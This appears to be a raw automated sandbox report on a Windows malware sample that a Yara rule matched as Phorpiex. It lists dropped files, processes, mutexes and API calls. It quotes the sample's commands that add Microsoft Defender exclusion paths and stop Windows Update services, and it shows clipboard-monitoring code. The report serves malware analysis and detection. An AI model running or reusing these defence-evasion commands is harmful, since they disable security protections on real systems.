                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004059B0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,1_2_004059B0
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004059B0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,1_2_004059B0

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Yara detected Phorpiex
                              Source: Yara matchFile source: 18.0.818921588.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.33080.scr.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.0.33080.scr.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 18.2.818921588.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 33080.scr PID: 7112, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 3060, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysppvrdnvs.exe PID: 4628, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 818921588.exe PID: 1516, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\33080.scr, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\818921588.exe, type: DROPPED
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_0040FB45 NtQueryVirtualMemory,1_2_0040FB45
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,1_2_0040DF20
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_0040FB45 NtQueryVirtualMemory,2_2_0040FB45
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,2_2_0040DF20
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040FB45 NtQueryVirtualMemory,17_2_0040FB45
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,17_2_0040DF20
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrFile created: C:\Windows\sysppvrdnvs.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004084D01_2_004084D0
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004084F91_2_004084F9
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004040901_2_00404090
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_0040AEB01_2_0040AEB0
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_004049701_2_00404970
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_0040F9081_2_0040F908
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_004084D02_2_004084D0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_004084F92_2_004084F9
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_004040902_2_00404090
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_0040AEB02_2_0040AEB0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_004049702_2_00404970
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_0040F9082_2_0040F908
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004084D017_2_004084D0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004084F917_2_004084F9
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040409017_2_00404090
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040AEB017_2_0040AEB0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040497017_2_00404970
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040F90817_2_0040F908
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exe 9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\33080.scr 9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                              Source: Bjl3geiFEK.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: classification engineClassification label: mal100.troj.evad.winEXE@27/15@0/7
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_00406F70 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,1_2_00406F70
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_00406660 CoInitialize,CoCreateInstance,wsprintfW,wsprintfW,1_2_00406660
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tdrpl[1].exeJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                              Source: C:\Windows\sysppvrdnvs.exeMutant created: \Sessions\1\BaseNamedObjects\mmn7nnm8na
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3236:120:WilError_03
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeFile created: C:\Users\user\AppData\Local\Temp\33080.scrJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCommand line argument: 778g87b7b8787b70_2_004B10B0
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCommand line argument: 778g87b7b8787b70_2_004B10B0
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCommand line argument: 778g87b7b8787b70_2_004B10B0
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCommand line argument: 778g87b7b8787b70_2_004B10B0
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCommand line argument: %s\%s0_2_004B10B0
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCommand line argument: %s\%d%s0_2_004B10B0
                              Source: Bjl3geiFEK.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\Bjl3geiFEK.exe "C:\Users\user\Desktop\Bjl3geiFEK.exe"
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeProcess created: C:\Users\user\AppData\Local\Temp\33080.scr "C:\Users\user\AppData\Local\Temp\33080.scr" /S
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrProcess created: C:\Windows\sysppvrdnvs.exe C:\Windows\sysppvrdnvs.exe
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Source: unknownProcess created: C:\Windows\sysppvrdnvs.exe "C:\Windows\sysppvrdnvs.exe"
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\818921588.exe C:\Users\user\AppData\Local\Temp\818921588.exe
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeProcess created: C:\Users\user\AppData\Local\Temp\33080.scr "C:\Users\user\AppData\Local\Temp\33080.scr" /SJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrProcess created: C:\Windows\sysppvrdnvs.exe C:\Windows\sysppvrdnvs.exeJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /waitJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\818921588.exe C:\Users\user\AppData\Local\Temp\818921588.exeJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauservJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvcJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /waitJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: firewallapi.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: fwbase.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\sysppvrdnvs.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\818921588.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\818921588.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\818921588.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\818921588.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\818921588.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\818921588.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                              Source: Bjl3geiFEK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Bjl3geiFEK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: Bjl3geiFEK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: Bjl3geiFEK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: Bjl3geiFEK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: Bjl3geiFEK.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
